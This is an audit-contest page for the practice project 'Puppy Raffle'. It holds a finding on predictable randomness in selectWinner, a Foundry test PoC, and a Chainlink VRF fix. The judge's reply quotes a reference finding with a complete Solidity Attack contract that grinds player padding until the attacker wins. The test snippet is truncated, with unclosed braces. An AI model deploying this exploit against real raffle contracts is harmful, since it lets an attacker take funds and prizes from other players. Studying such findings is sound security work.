Puppy Raffle

AI First Flight #1

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Previous Next

Submission Details

Severity: high

Valid

Weak Randomness in selectWinner Allows Winner Manipulation

leoyeesir

Root + Impact

Description

The selectWinner function (line 125~154) generates randomness using on-chain predictable variables:

uint256 winnerIndex = uint256(keccak256(abi.encodePacked(msg.sender, block.timestamp, block.difficulty))) % players.length;

These values are not cryptographically secure:

block.timestamp can be manipulated by validators within ~12-15 seconds
block.difficulty (now prevrandao) is influenced by block proposers
msg.sender is attacker-controlled

This creates a deterministic pseudo-random number that sophisticated actors can predict or influence.

Risk

Midium. The randomness source is completely predictable and potentially manipulable:

Grinding Attacks: Attackers can simulate thousands of transactions off-chain to predict exactly when they will win, only calling selectWinner at favorable timestamps
Validator Manipulation: Block proposers can influence block.timestamp (within ~12-15 second variance) and prevrandao to ensure favorable outcomes for themselves or accomplices
Mempool Monitoring: Sophisticated actors can front-run selectWinner transactions if they can predict the winner based on pending block conditions

Impact:

Financial Loss: Attackers can guarantee they win valuable NFT prizes and accumulated ETH entrance fees
Protocol Integrity: Complete erosion of trust in the raffle fairness, rendering the protocol unusable for legitimate participants
Game Theory Failure: Rational actors will only participate if they can exploit the randomness, leading to adversarial-only participation

Proof of Concept

Description of PoC: The test demonstrates two critical vulnerabilities:

Determinism: Given identical inputs (msg.sender, block.timestamp, block.difficulty), the winner selection is identical across different raffle instances
Grinding Attack: An attacker can iterate through future timestamps to find a value that makes their chosen index the winner, then ensure selectWinner is called at that exact time (or manipulate block timestamp if they are a validator)

function testPredictableWinnerSelection() public {

uint256 fixedTimestamp = 1000;

uint256 fixedBlockNumber = 1000;

vm.warp(fixedTimestamp);

vm.roll(fixedBlockNumber);

// Same conditions produce same winner

PuppyRaffle raffle1 = new PuppyRaffle(entranceFee, feeAddress, duration);

address[] memory players = new address[](4);

players[0] = playerOne;

players[1] = playerTwo;

players[2] = playerThree;

players[3] = playerFour;

raffle1.enterRaffle{value: entranceFee * 4}(players);

vm.warp(fixedTimestamp + duration + 1);

raffle1.selectWinner();

address firstWinner = raffle1.previousWinner();

// Exact same setup produces same winner

vm.warp(fixedTimestamp);

PuppyRaffle raffle2 = new PuppyRaffle(entranceFee, feeAddress, duration);

raffle2.enterRaffle{value: entranceFee * 4}(players);

vm.warp(fixedTimestamp + duration + 1);

raffle2.selectWinner();

assertEq(firstWinner, raffle2.previousWinner()); // Predictable!

// Grinding attack - attacker can find favorable timestamp

for (uint256 i = 0; i < 20; i++) {

uint256 attemptTimestamp = fixedTimestamp + duration + i + 1;

uint256 expectedIndex = uint256(

keccak256(

abi.encodePacked(

address(this),

attemptTimestamp,

block.difficulty

)

) % 4;

if (expectedIndex == 3) { // Attacker wants index 3 to win

vm.warp(fixedTimestamp);

PuppyRaffle raffle3 = new PuppyRaffle(entranceFee, feeAddress, duration);

raffle3.enterRaffle{value: entranceFee * 4}(players);

vm.warp(attemptTimestamp);

raffle3.selectWinner();

assertEq(raffle3.previousWinner(), playerFour);

break;

}

Recommended Mitigation

Replace the insecure on-chain randomness generation with Chainlink VRF v2.5 (Verifiable Random Function), which provides cryptographically secure, provably fair randomness via oracle network:

// Request randomness from Chainlink oracle

function requestRandomWords() internal returns (uint256 requestId) {

requestId = s_vrfCoordinator.requestRandomWords(

VRFV2PlusClient.RandomWordsRequest({

keyHash: keyHash,

subId: s_subscriptionId,

requestConfirmations: requestConfirmations,

callbackGasLimit: callbackGasLimit,

numWords: numWords,

extraArgs: VRFV2PlusClient._argsToBytes(

VRFV2PlusClient.ExtraArgsV1({nativePayment: false})

)

})

);

}

// Chainlink oracle calls back with cryptographically secure randomness

function fulfillRandomWords(uint256 _requestId, uint256[] calldata _randomWords) internal override {

uint256 winnerIndex = _randomWords[0] % players.length;

address winner = players[winnerIndex];

// Proceed with prize distribution using winner

}

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 10 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!